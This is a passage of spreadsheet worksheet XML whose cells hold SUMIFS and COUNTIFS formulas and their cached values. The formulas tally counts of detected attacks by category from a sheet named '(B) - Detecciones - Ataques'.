        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>1</v>
      </c>
      <c r="BK74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>5</v>
      </c>
      <c r="BL74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3470812</v>
      </c>
      <c r="BN74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>1081436</v>
      </c>
      <c r="BO74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>205</v>
      </c>
      <c r="BR74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>1</v>
      </c>
      <c r="BT74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>0</v>
      </c>
      <c r="BX74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>43</v>
      </c>
      <c r="BZ74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>266</v>
      </c>
      <c r="CA74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>6</v>
      </c>
      <c r="CI74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>34</v>
      </c>
      <c r="CJ74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>14</v>
      </c>
      <c r="CL74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>12</v>
      </c>
      <c r="CN74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>13</v>
      </c>
      <c r="CP74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>29</v>
      </c>
      <c r="CQ74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>9556</v>
      </c>
      <c r="CT74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>2</v>
      </c>
      <c r="CU74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>7</v>
      </c>
      <c r="CY74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>64</v>
      </c>
      <c r="CZ74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>4</v>
      </c>
      <c r="DF74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>22</v>
      </c>
      <c r="DI74" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>11609</v>
      </c>
      <c r="DJ74" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EF3:$EF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>9</v>
      </c>
      <c r="DK74" s="271"/>
      <c r="DO74" s="279"/>
      <c r="DP74" s="271"/>
      <c r="DQ74" s="271"/>
      <c r="DR74" s="271"/>
      <c r="DS74" s="271"/>
      <c r="DT74" s="271"/>
      <c r="DU74" s="271"/>
      <c r="DV74" s="271"/>
      <c r="DW74" s="271"/>
      <c r="DX74" s="271"/>
      <c r="DY74" s="271"/>
      <c r="DZ74" s="271"/>
      <c r="EA74" s="271"/>
      <c r="EB74" s="271"/>
      <c r="EC74" s="271"/>
      <c r="ED74" s="280"/>
      <c r="EG74" s="279"/>
      <c r="EH74" s="271"/>
      <c r="EI74" s="271"/>
      <c r="EJ74" s="271"/>
      <c r="EK74" s="271"/>
      <c r="EL74" s="271"/>
      <c r="EM74" s="271"/>
      <c r="EN74" s="271"/>
      <c r="EO74" s="271"/>
      <c r="EP74" s="478"/>
      <c r="EQ74" s="478"/>
      <c r="ER74" s="478"/>
      <c r="ES74" s="271"/>
      <c r="ET74" s="271"/>
      <c r="EU74" s="271"/>
      <c r="EV74" s="271"/>
      <c r="EW74" s="271"/>
      <c r="EX74" s="271"/>
      <c r="EY74" s="271"/>
      <c r="EZ74" s="271"/>
      <c r="FA74" s="280"/>
      <c r="FD74" s="480"/>
      <c r="FE74" s="480"/>
      <c r="FF74" s="480"/>
      <c r="FG74" s="480"/>
      <c r="FH74" s="480"/>
      <c r="FI74" s="480"/>
      <c r="FJ74" s="480"/>
      <c r="FK74" s="480"/>
      <c r="FL74" s="480"/>
      <c r="FM74" s="480"/>
      <c r="FN74" s="480"/>
      <c r="FO74" s="480"/>
      <c r="FP74" s="480"/>
      <c r="FQ74" s="480"/>
      <c r="FR74" s="480"/>
      <c r="FS74" s="480"/>
      <c r="FT74" s="480"/>
      <c r="FU74" s="480"/>
      <c r="FV74" s="480"/>
      <c r="FW74" s="480"/>
      <c r="FX74" s="480"/>
      <c r="FY74" s="379" t="s">
        <v>664</v>
      </c>
      <c r="FZ74" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*"))</f>
        <v>0.4261363636</v>
      </c>
      <c r="GA74" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="GB74" s="480"/>
      <c r="GC74" s="379" t="s">
        <v>664</v>
      </c>
      <c r="GD74" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*"))</f>
        <v>0.4147727273</v>
      </c>
      <c r="GE74" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY57)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY57 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="GF74" s="480"/>
      <c r="GG74" s="480"/>
      <c r="GH74" s="480"/>
      <c r="GI74" s="480"/>
      <c r="GJ74" s="480"/>
      <c r="GK74" s="480"/>
      <c r="GL74" s="480"/>
      <c r="GM74" s="480"/>
      <c r="GN74" s="480"/>
      <c r="GO74" s="480"/>
      <c r="GP74" s="480"/>
      <c r="GQ74" s="480"/>
      <c r="GR74" s="480"/>
      <c r="GS74" s="480"/>
      <c r="GT74" s="480"/>
      <c r="GU74" s="480"/>
      <c r="GV74" s="480"/>
      <c r="GW74" s="480"/>
      <c r="GX74" s="480"/>
      <c r="GY74" s="480"/>
      <c r="GZ74" s="480"/>
      <c r="HA74" s="480"/>
      <c r="HB74" s="480"/>
      <c r="HC74" s="480"/>
      <c r="HD74" s="480"/>
      <c r="HE74" s="480"/>
      <c r="HF74" s="480"/>
      <c r="HG74" s="480"/>
      <c r="HH74" s="480"/>
      <c r="HI74" s="480"/>
      <c r="HJ74" s="480"/>
      <c r="HK74" s="480"/>
      <c r="HL74" s="480"/>
      <c r="HM74" s="480"/>
      <c r="HN74" s="480"/>
      <c r="HO74" s="480"/>
      <c r="HP74" s="480"/>
    </row>
    <row r="75">
      <c r="J75" s="277"/>
      <c r="K75" s="500">
        <f t="shared" ref="K75:N75" si="63">K40/$L$34</f>
        <v>0.04777768749</v>
      </c>
      <c r="L75" s="501">
        <f t="shared" si="63"/>
        <v>0.09596164784</v>
      </c>
      <c r="M75" s="501">
        <f t="shared" si="63"/>
        <v>0.107662306</v>
      </c>
      <c r="N75" s="502">
        <f t="shared" si="63"/>
        <v>0.1090436337</v>
      </c>
      <c r="O75" s="278"/>
      <c r="Q75" s="271"/>
      <c r="R75" s="386" t="s">
        <v>2542</v>
      </c>
      <c r="S75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>724606</v>
      </c>
      <c r="T75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>719839</v>
      </c>
      <c r="U75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>612</v>
      </c>
      <c r="V75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>37</v>
      </c>
      <c r="W75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>12</v>
      </c>
      <c r="X75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>91661</v>
      </c>
      <c r="Y75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>802</v>
      </c>
      <c r="Z75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>4552249</v>
      </c>
      <c r="AA75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>526</v>
      </c>
      <c r="AB75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>82</v>
      </c>
      <c r="AC75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>42</v>
      </c>
      <c r="AD75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>9566</v>
      </c>
      <c r="AE75" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>75</v>
      </c>
      <c r="AF75" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>11652</v>
      </c>
      <c r="AG75" s="271"/>
      <c r="AH75" s="386" t="s">
        <v>2542</v>
      </c>
      <c r="AI75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>724598</v>
      </c>
      <c r="AJ75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>7</v>
      </c>
      <c r="AL75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>719839</v>
      </c>
      <c r="AN75" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EO3:$EO139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO75" s="355">
